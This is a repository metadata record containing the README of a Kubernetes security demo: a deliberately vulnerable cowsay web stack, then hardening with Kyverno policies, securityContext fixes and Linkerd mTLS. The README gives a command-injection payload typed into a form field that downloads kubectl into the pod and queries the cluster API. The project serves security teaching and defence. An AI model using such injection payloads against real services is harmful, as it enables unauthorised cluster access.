{"id":25024227,"url":"https://github.com/gridexx/vulnerable-web-stack-kube","last_synced_at":"2026-04-13T01:11:06.107Z","repository":{"id":218578037,"uuid":"746759749","full_name":"GridexX/vulnerable-web-stack-kube","owner":"GridexX","description":"How misconfigured services inside Kubernetes can lead to privilege escalation","archived":false,"fork":false,"pushed_at":"2024-02-17T11:07:34.000Z","size":7758,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-02-05T15:54:56.694Z","etag":null,"topics":["kubernetes","security","workload"],"latest_commit_sha":null,"homepage":"","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/GridexX.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2024-01-22T16:11:44.000Z","updated_at":"2024-02-17T11:40:44.000Z","dependencies_parsed_at":"2024-02-17T12:33:36.293Z","dependency_job_id":null,"html_url":"https://github.com/GridexX/vulnerable-web-stack-kube","commit_stats":null,"previous_names":["gridexx/gridexx-vulnerable-web-stack-kube"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/GridexX%2Fvulnerable-web-stack-kube","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/GridexX%2Fvulnerable-web-stack-kube/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/GridexX%2Fvulnerable-web-stack-kube/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/GridexX%2Fvulnerable-web-stack-
kube/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/GridexX","download_url":"https://codeload.github.com/GridexX/vulnerable-web-stack-kube/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246328748,"owners_count":20759821,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["kubernetes","security","workload"],"created_at":"2025-02-05T15:52:35.540Z","updated_at":"2026-04-13T01:11:01.081Z","avatar_url":"https://github.com/GridexX.png","language":"TypeScript","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003cdiv align=\"center\"\u003e\n  \u003cimg src=\"https://github.com/GridexX/vulnerable-web-stack-kube/assets/50552672/990b9e90-7446-4c4f-b9ad-4fe1225d21fd\" width=\"300\"\u003e\n  \u003ch1\u003e\n    Vulnerable Web Stack Kube\n  \u003c/h1\u003e\n  \u003ch4\u003eHow misconfigured services inside Kubernetes can lead to privilege escalation\u003c/h4\u003e\n  \u003cp align=\"center\"\u003e\n    \u003ca href=\"https://github.com/GridexX/vulnerable-web-stack-kube\"\u003e\u003cimg src=\"https://img.shields.io/github/stars/GridexX/vulnerable-web-stack-kube.svg?style=flat\" alt=\"stars\"\u003e\u003c/a\u003e\n    \u003ca href=\"https://github.com/GridexX/vulnerable-web-stack-kube\"\u003e\u003cimg src=\"https://img.shields.io/github/license/GridexX/vulnerable-web-stack-kube.svg?style=flat\" alt=\"license\"\u003e\u003c/a\u003e\n  \u003c/p\u003e\n\u003c/div\u003e\n\n\n\nThere are two services in this repository, a client and a server. 
The client is a simple web application that sends a message to the server. The server is a simple web application that receives a message and displays it in the console with the cowsay command.\n\n## How to use it ❓\n\n```bash\ncd vulnerable-web-stack-kube\nkubectl apply -f ./k8s/resources\n# Port-forward the client and server application\nkubectl port-forward client-deployment-ip-service 8080:80\nkubectl port-forward server-deployment-ip-service 3000:8000\n```\n\n### Try the vulnerability 🥷\n\nOpen your browser and go to [http://localhost:8080](http://localhost:8080). You will see a form with a text area. Write a message and click on the send button. You will see the message displayed in the console of the server pod.\n\nCopy and paste the following text into the text area:\n\n```bash\nhello; curl -LO https://dl.k8s.io/release/$(curl -Ls https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl; chmod +x ./kubectl\n```\n\nThis will download kubectl inside the pod and give us the possibility to execute commands inside the pod:\n\n```bash\nhello; ./kubectl get pods\n```\n\nWe can see that the command is executed inside the pod and that we can reach the kube API.\n\n### Protect the cluster with kyverno 🏰\n\nTo protect the cluster we will use kyverno. Kyverno is a policy engine for Kubernetes. 
It allows us to define policies that will be applied to the cluster.\nWe will also display the policy violations in a grafana dashboard.\nTo do so, we will deploy the kube-prometheus-stack chart and kyverno with Helm:\n\n```bash\n# Install the Helm repositories\ncd ./vulnerable-web-stack-kube\nhelm repo add kyverno https://kyverno.github.io/kyverno/\nhelm repo add prometheus-community https://prometheus-community.github.io/helm-charts\nhelm repo update\nhelm install kyverno kyverno/kyverno -f k8s/values/kyverno-values.yaml -n kyverno --create-namespace\nhelm install prom-stack prometheus-community/kube-prometheus-stack -f k8s/values/prom-stack-values.yaml\n# Port-forward the grafana dashboard\nkubectl port-forward -n prom-stack-grafana-uuid 3001:3000\n\n# Fix the policy violation\n# Remove the resources\nkubectl delete -f ./k8s/resources\n# Apply the policies\nkubectl apply -f ./k8s/policies\n```\n\nNow if we re-deploy the resources, we will see that the server pod is not created.\n\nTo fix the policy violation, we added `securityContext` fields in the deployment manifest of the server.\nWith this fixed manifest, the server pod will be created. Apply the fixed manifest with:\n\n```bash\n# Reapply the fixed resources\nkubectl apply -f ./k8s/resources_fixed\n```\n\nRestart the port-forwarding of the server pod and try the vulnerability again. You will see that the command is not executed inside the pod :white_check_mark:\n\n#### See the policy violations in the grafana dashboard 📊\n\nGo to [http://localhost:3001](http://localhost:3001) and log in with the default credentials (admin:prom-operator).\nYou will see the dashboard with the policy violations.\n\n### Sign and build the docker images ✍️\n\nThis step describes how to build and sign the docker images.\n\n1. 
The server\n\n    ```bash\n    cd ./services/server\n    docker build -t \u003cyour-docker-hub-username\u003e/vulnerable-web-stack-kube-server:latest .\n    docker trust sign \u003cyour-docker-hub-username\u003e/vulnerable-web-stack-kube-server:latest\n    ```\n\n2. The client\n\n    ```bash\n    cd ./services/client\n    docker build -t \u003cyour-docker-hub-username\u003e/vulnerable-web-stack-kube-client:latest .\n    docker trust sign \u003cyour-docker-hub-username\u003e/vulnerable-web-stack-kube-client:latest\n    ```\n\n### Add a service Mesh and mTLS communication between services\n\n\u003e [!NOTE]\n\u003e This step is optional and requires a service mesh like Linkerd. To do so, you first need to install the Linkerd CLI and the Linkerd control plane.\n\n1. Install the Linkerd CLI\n\n    ```bash\n    curl --proto '=https' --tlsv1.2 -sSfL https://run.linkerd.io/install | sh\n    export PATH=$PATH:$HOME/.linkerd2/bin\n    ```\n\n2. Install the Linkerd control plane\n\n    To check and validate that everything is configured and your cluster is ready to install Linkerd, run:\n\n    ```bash\n    linkerd check --pre\n    ```\n\n    If there are any checks that do not pass, make sure to follow the provided links and fix those issues before proceeding.\n\n    Now install the Linkerd control plane by running:\n\n    ```bash\n    linkerd install | kubectl apply -f -\n    ```\n\n3. Install Linkerd onto your cluster\n\n    Now that you have the CLI running locally and a cluster that is ready to go, it’s time to install Linkerd on your Kubernetes cluster. To do this, run:\n\n    ```bash\n    linkerd install --crds | kubectl apply -f -\n    linkerd install | kubectl apply -f -\n    ```\n\n    Wait for the control plane to be ready (and verify your installation) by running:\n\n    ```bash\n    linkerd check\n    ```\n\n4. Add mTLS communication between the services\n\n    Ensure the Server and Client services are running in the `default` namespace. 
We will now install the Linkerd service mesh and add mTLS communication between the services.\n\n    ```bash\n    kubectl get deploy -o yaml \\\n    | linkerd inject - \\\n    | kubectl apply -f -\n    ```\n\n    This command retrieves all of the deployments running, runs their manifests through linkerd inject, and then reapplies them to the cluster. This will add the Linkerd proxy to each of the deployments, and enable mTLS communication between the services.\n\n    \u003e [!NOTE]\n    \u003e Congratulations! You have now installed Linkerd and added mTLS communication between the services.\n\n5. Explore the Linkerd dashboard (optional)\n\n    We’ve added Linkerd to Cowsay, but there are no visible changes to the application!\n\n    Let’s take a closer look at what Linkerd is actually doing. To do this, let’s install the viz extension, which will install an on-cluster metric stack and dashboard. To install the viz extension, run:\n\n    ```bash\n    linkerd viz install | kubectl apply -f - # install the on-cluster metrics stack\n    ```\n\n    Once you’ve installed the extension, let’s validate everything one last time:\n\n    ```bash\n    linkerd check\n    ```\n\n    With the control plane and extensions installed and running, we’re now ready to explore Linkerd! Access the dashboard with:\n\n    ```bash\n    linkerd viz dashboard \u0026\n    ```\n\n    This command will open the Linkerd dashboard in your default web browser.\n\n## Clean the cluster 🗑️\n\n```bash\nkubectl delete -f ./k8s/policies\nkubectl delete -f ./k8s/resources\n```\n\n### License\n\nThis project is licensed under the MIT License - see the LICENSE file for details. 
\n\n### Author 👨‍💻\n\nDeveloped in the ☁️ with 🔒 by [GridexX](https://github.com/GridexX)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgridexx%2Fvulnerable-web-stack-kube","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fgridexx%2Fvulnerable-web-stack-kube","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgridexx%2Fvulnerable-web-stack-kube/lists"}